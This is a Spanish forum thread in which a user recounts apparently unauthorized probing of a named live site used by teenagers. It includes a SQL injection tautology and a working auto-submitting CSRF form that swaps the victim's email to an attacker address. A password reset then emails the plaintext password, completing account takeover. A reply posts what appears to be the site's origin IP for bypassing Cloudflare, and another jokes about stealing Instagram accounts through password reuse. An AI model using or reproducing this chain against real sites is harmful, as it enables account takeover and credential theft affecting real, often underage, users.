Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Instalo un WAF y me olvido de buenas configuraciones. [ThisCrush]

  • 3 Respuestas
  • 3501 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Marzo 31, 2018, 10:00:54 pm »
Muy buenas Underc0ders,

hace tiempo descubrí una página en la que creas un perfil y la gente puede hacerte preguntas para que tu respondas de una forma anónima. Por lo visto se puso algo de moda entre los adolescentes en España, se trata de http://www.thiscrush.com.

Hoy me ha dado algo de intriga y me he puesto a ver si le encontraba algo interesante. Lo primero que me ha dado por mirar ha sido una opción en la que podías dar un "Me Gusta" al perfil de la persona.



Vamos a abrir BurpSuite y veamos como va la petición al pulsar este botoncito.



Vemos que solo enviamos un parámetro que es el ID que corresponde al usuario al que se le va a añadir el "Me Gusta". Sabiendo esto, pensé que con una tautología tal vez pudieramos o bien dar un punto a todos los usuarios de la plataforma, o bien encontrar una bonita blind SQLi.

Código: [Seleccionar]
id=usuario' OR 1=1 -- -
Al contrario de lo que yo pensaba me encontré como respuesta algo como así.



Esto es el WAF de CloudFlare, que comprueba todas las peticiones que se hacen a dicha página web y dependiendo de si son peligrosas o no decide si bloquearlas, lo que me hizo desilusionarme un poco ya que esto complica bastante las cosas.



Después de esto seguí mirando a ver si encontraba algo interesante, al rato de estar dando vueltas sin ningún tipo de sentido decidí mirar la configuración de una cuenta falsa que me había creado.



Al comprobar como era la petición al hacer un cambio en la configuración vemos lo siguiente.



Bueno, vemos que no envía ningún tipo de tocken, así que es vulnerable a CSRF y CloudFlare no será capaz de bloquear este tipo de ataque. Vamos a imitar el formulario, pondremos que envíe nuestro correo y lo subimos a algún tipo de Hosting privado. A mi me quedó de la siguiente forma.

Código: HTML5
  1. </head>
  2. <form action="http://thiscrush.com/settings.php?cmd=go" method="POST" id="myForm">
  3. <input type="hidden" name="email" value="thiscrush@yopmail.com" />
  4. <img src=x onerror="myFunction()">
  5. function myFunction() {
  6.     document.getElementById("myForm").submit();
  7. }
  8. </body>
  9.  

Ahora con tan solo enviarle el link se le cambiaría el correo del usuario, así que lo siguiente que vamos a hacer es ir a la opción de recuperar contraseña y poner nuestro correo



Hay dos cosas graciosas en esto. La primera es que las contraseñas no son hasheadas, si no que se guardan en texto plano, y en lugar de enviarte un correo para que cambies la contraseña te la envían directamente, lo que es peligroso ya que pueden quedar comprometidas otras redes en las que el usuario use la misma contraseña.

El segundo dato gracioso es que usé una cuenta de YopMail para hacer esta prueba, y la respuesta que me dió fue la siguiente.



Por último me gustaría insistir en la importancia de tener las configuraciones bien hechas en nuestros servidores, ya que como hemos visto, a pesar de usar un WAF podemos tener problemas. Espero que les haya gustado.

También me pueden seguir en Twitter si les hace ilusión: @RoloMijan

Saludos.
« Última modificación: Marzo 31, 2018, 10:04:56 pm por rollth »

Desconectado Som€body

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
  • I know something you dont know ;)
    • Ver Perfil
« Respuesta #1 en: Marzo 31, 2018, 10:15:47 pm »
Buah, que jefe, a mi no se me había ocurrido vulnerar thiscrush.

Seguro que con esa tontería te sacas unas cuantas cuentas de insta, teniendo en cuenta que la gente siempre usa la misma pass xDDDD.

Se va a liar muy parda xDDDDDDDDD

Desconectado sadfud

  • *
  • Moderador
  • Mensajes: 182
  • Actividad:
    3.33%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #2 en: Abril 01, 2018, 12:36:35 am »
Buen post rolo

Esto es el WAF de CloudFlare, que comprueba todas las peticiones que se hacen a dicha página web y dependiendo de si son peligrosas o no decide si bloquearlas, lo que me hizo desilusionarme un poco ya que esto complica bastante las cosas.


Dejo esto por aqui y me retiro lentamente... 18.197.186.60
Si necesitas ayuda, no dudes en mandar MP

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #3 en: Abril 01, 2018, 08:40:25 am »
Buen post rolo

Esto es el WAF de CloudFlare, que comprueba todas las peticiones que se hacen a dicha página web y dependiendo de si son peligrosas o no decide si bloquearlas, lo que me hizo desilusionarme un poco ya que esto complica bastante las cosas.


Dejo esto por aqui y me retiro lentamente... 18.197.186.60

Creo que tu comentario de una linea ya es mejor que todo el Post jajajajaja

Saludos.

 

¿Te gustó el post? COMPARTILO!